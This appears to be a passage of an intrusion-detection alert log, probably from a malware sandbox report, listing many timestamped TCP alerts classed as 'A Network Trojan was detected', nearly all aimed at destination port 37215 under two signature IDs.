                Timestamp:06/14/24-10:44:12.641700
                SID:2829579
                Source Port:52334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715105
                SID:2835222
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668157
                SID:2829579
                Source Port:49716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027195
                SID:2835222
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967457
                SID:2829579
                Source Port:45078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806718
                SID:2835222
                Source Port:45138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322679
                SID:2829579
                Source Port:55866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470549
                SID:2835222
                Source Port:49164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545832
                SID:2829579
                Source Port:38128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997975
                SID:2835222
                Source Port:33704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806052
                SID:2829579
                Source Port:49848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803222
                SID:2835222
                Source Port:35670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646808
                SID:2829579
                Source Port:59744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159323
                SID:2829579
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422951
                SID:2835222
                Source Port:38794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501763
                SID:2835222
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684321
                SID:2829579
                Source Port:42446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989889
                SID:2829579
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766211
                SID:2835222
                Source Port:42438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326116
                SID:2829579
                Source Port:38228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408880
                SID:2829579
                Source Port:50410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859945
                SID:2829579
                Source Port:39602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762783
                SID:2829579
                Source Port:45100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763571
                SID:2835222
                Source Port:55456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543630
                SID:2829579
                Source Port:54582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967834
                SID:2829579
                Source Port:44464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917274
                SID:2829579
                Source Port:40432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056548
                SID:2835222
                Source Port:42526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018780
                SID:2835222
                Source Port:35136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201072
                SID:2835222
                Source Port:58014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054273
                SID:2829579
                Source Port:60118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001447
                SID:2829579
                Source Port:42072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718352
                SID:2829579
                Source Port:60506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645739
                SID:2829579
                Source Port:33286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134090
                SID:2835222
                Source Port:43668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185132
                SID:2835222
                Source Port:58114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705483
                SID:2829579
                Source Port:46222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999768
                SID:2835222
                Source Port:60116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807018
                SID:2835222
                Source Port:51014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015199
                SID:2835222
                Source Port:36130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293187
                SID:2829579
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382493
                SID:2835222
                Source Port:38950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564490
                SID:2835222
                Source Port:48846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184924
                SID:2835222
                Source Port:43090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518941
                SID:2829579
                Source Port:47618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967619
                SID:2829579
                Source Port:45012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878283
                SID:2829579
                Source Port:45186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453310
                SID:2835222
                Source Port:50588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849282
                SID:2829579
                Source Port:54666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132953
                SID:2835222
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986152
                SID:2829579
                Source Port:55784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023140
                SID:2835222
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967337
                SID:2829579
                Source Port:60066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368921
                SID:2835222
                Source Port:48706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177417
                SID:2835222
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274505
                SID:2829579
                Source Port:52276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761863
                SID:2829579
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661259
                SID:2835222
                Source Port:52628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878851
                SID:2835222
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111424
                SID:2835222
                Source Port:42032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028318
                SID:2835222
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184149
                SID:2829579
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419950
                SID:2829579
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425074
                SID:2829579
                Source Port:33138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181537
                SID:2835222
                Source Port:38432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343695
                SID:2829579
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997077
                SID:2829579
                Source Port:55818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661622
                SID:2829579
                Source Port:51980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966675
                SID:2829579
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148335
                SID:2829579
                Source Port:34844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980404
                SID:2835222
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972503
                SID:2835222
                Source Port:33784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340728
                SID:2835222
                Source Port:42230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883085
                SID:2829579
                Source Port:42852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111996
                SID:2829579
                Source Port:39260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135084
                SID:2829579
                Source Port:59348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850083
                SID:2829579
                Source Port:36256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011485
                SID:2829579
                Source Port:32916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146906
                SID:2835222
                Source Port:40716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904919
                SID:2835222
                Source Port:33470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075270
                SID:2829579
                Source Port:51516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683103
                SID:2829579
                Source Port:34652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089992
                SID:2835222
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470662
                SID:2835222
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132407
                SID:2829579
                Source Port:49760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663611
                SID:2829579
                Source Port:52620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052342
                SID:2829579
                Source Port:38156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185751
                SID:2829579
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181655
                SID:2829579
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703489
                SID:2835222
                Source Port:47716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:44.422789
                SID:2840515
                Source Port:51878
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565938
                SID:2829579
                Source Port:52338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671114
                SID:2835222
                Source Port:52272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775984
                SID:2835222
                Source Port:58408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084813
                SID:2835222
                Source Port:40394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723990
                SID:2829579
                Source Port:47556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069811
                SID:2829579
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663546
                SID:2835222
                Source Port:38536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244708
                SID:2835222
                Source Port:59112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565668
                SID:2835222
                Source Port:35772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860127
                SID:2835222
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011541
                SID:2835222
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253397
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934481
                SID:2835222
                Source Port:38100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967114
                SID:2835222
                Source Port:57880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717057
                SID:2829579
                Source Port:36126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689482
                SID:2835222
                Source Port:58138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472806
                SID:2835222
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082357
                SID:2829579
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183821
                SID:2829579
                Source Port:59870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382793
                SID:2829579
                Source Port:52008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229219
                SID:2829579
                Source Port:49740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518638
                SID:2835222
                Source Port:45082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722087
                SID:2835222
                Source Port:53102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970709
                SID:2829579
                Source Port:52552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381260
                SID:2835222
                Source Port:35706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661612
                SID:2835222
                Source Port:33966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985698
                SID:2835222
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968903
                SID:2829579
                Source Port:53084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074628
                SID:2829579
                Source Port:57516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965318
                SID:2829579
                Source Port:48834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685159
                SID:2835222
                Source Port:36190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725704
                SID:2835222
                Source Port:53622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274229
                SID:2829579
                Source Port:58864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274813
                SID:2829579
                Source Port:50410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846277
                SID:2829579
                Source Port:52042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544471
                SID:2829579
                Source Port:39630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001747
                SID:2829579
                Source Port:43978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421113
                SID:2835222
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715563
                SID:2835222
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879813
                SID:2829579
                Source Port:55768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202542
                SID:2835222
                Source Port:50266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932448
                SID:2835222
                Source Port:41500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469682
                SID:2829579
                Source Port:53770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242407
                SID:2829579
                Source Port:49646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055261
                SID:2835222
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678513
                SID:2835222
                Source Port:54260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934309
                SID:2829579
                Source Port:35362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676961
                SID:2835222
                Source Port:58796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615150
                SID:2835222
                Source Port:55024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806754
                SID:2835222
                Source Port:53276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323764
                SID:2829579
                Source Port:52256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453139
                SID:2835222
                Source Port:51684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368945
                SID:2835222
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906203
                SID:2829579
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274114
                SID:2829579
                Source Port:54692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384220
                SID:2835222
                Source Port:35168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017962
                SID:2829579
                Source Port:59246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292418
                SID:2829579
                Source Port:56422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563777
                SID:2835222
                Source Port:34286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070697
                SID:2829579
                Source Port:51600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150295
                SID:2835222
                Source Port:44202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735238
                SID:2835222
                Source Port:56892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684131
                SID:2835222
                Source Port:39976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827944
                SID:2835222
                Source Port:57000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152219
                SID:2835222
                Source Port:56276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999513
                SID:2829579
                Source Port:39812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032548
                SID:2835222
                Source Port:42600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185200
                SID:2835222
                Source Port:49382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182924
                SID:2829579
                Source Port:51550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667800
                SID:2835222
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145616
                SID:2835222
                Source Port:57956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857840
                SID:2835222
                Source Port:59218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000628
                SID:2829579
                Source Port:43738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450704
                SID:2835222
                Source Port:39306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941957
                SID:2829579
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011249
                SID:2835222
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967767
                SID:2829579
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083214
                SID:2829579
                Source Port:38380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473568
                SID:2835222
                Source Port:58820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368177
                SID:2829579
                Source Port:34912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133340
                SID:2829579
                Source Port:57276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761320
                SID:2829579
                Source Port:46404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054129
                SID:2835222
                Source Port:47768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703573
                SID:2829579
                Source Port:58126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275490
                SID:2829579
                Source Port:50488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735594
                SID:2829579
                Source Port:42528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181614
                SID:2829579
                Source Port:53320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941567
                SID:2829579
                Source Port:35068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023746
                SID:2829579
                Source Port:35558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501141
                SID:2829579
                Source Port:32860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827681
                SID:2829579
                Source Port:40674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180201
                SID:2829579
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980147
                SID:2829579
                Source Port:44736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810672
                SID:2829579
                Source Port:34486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761192
                SID:2829579
                Source Port:38072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150974
                SID:2829579
                Source Port:59980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368728
                SID:2835222
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225826
                SID:2835222
                Source Port:59098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365403
                SID:2835222
                Source Port:58446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990428
                SID:2829579
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803379
                SID:2835222
                Source Port:47564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761607
                SID:2829579
                Source Port:52328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860682
                SID:2835222
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725049
                SID:2829579
                Source Port:37030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882836
                SID:2835222
                Source Port:37016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087997
                SID:2835222
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202117
